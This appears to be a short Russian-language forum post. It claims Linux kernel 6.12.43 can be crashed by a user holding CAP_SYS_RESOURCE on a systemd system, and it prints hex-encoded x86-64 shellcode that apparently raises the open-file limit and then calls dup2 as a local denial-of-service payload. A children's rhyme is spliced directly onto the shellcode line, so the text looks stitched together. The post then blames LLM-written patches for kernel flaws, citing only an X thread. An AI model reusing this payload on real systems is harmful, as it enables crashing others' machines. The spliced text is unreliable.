В LTS ветке ядра Linux, версии 6.12.43, можно легко крашнуть при условии наличия привелегии CAP_SYS_RESOURCE
и установленного systemd
с помощью следующего кода:
40 b7 40 c1 e7 18 83 ef 08 57 57 31 ff 40 b7 07 31 c0 b0 a0 48 89 e6 0f 05 5e ff ce 31 ff b0 21 0f 05 тёрли свинки друг другу спинки мыли хвостики крючки отмывали пятачки парились веничком парились берёзовым вылетали из парной облачком розовым
Это не первый раз, когда «AI slop» в Linux привлекает внимание. До этого вайб-кодер из Nvidia добавил уязвимости в Linux на пустом месте из-за того что использовал LLM без проверки кода, который она ему выдала.
И это только начало, судя по политике приёма патчей (точнее, отстутсивю любых проверок на валидность кода в патчах, если код приходит от друзей-корпоратов).
Никто не знает полное количество уязвимостей, которые уже успели попасть в Linux за время существования AI в их современном понимании.
Более подробно в треде в X (Twitter)
Перемещено hobbit из linux-general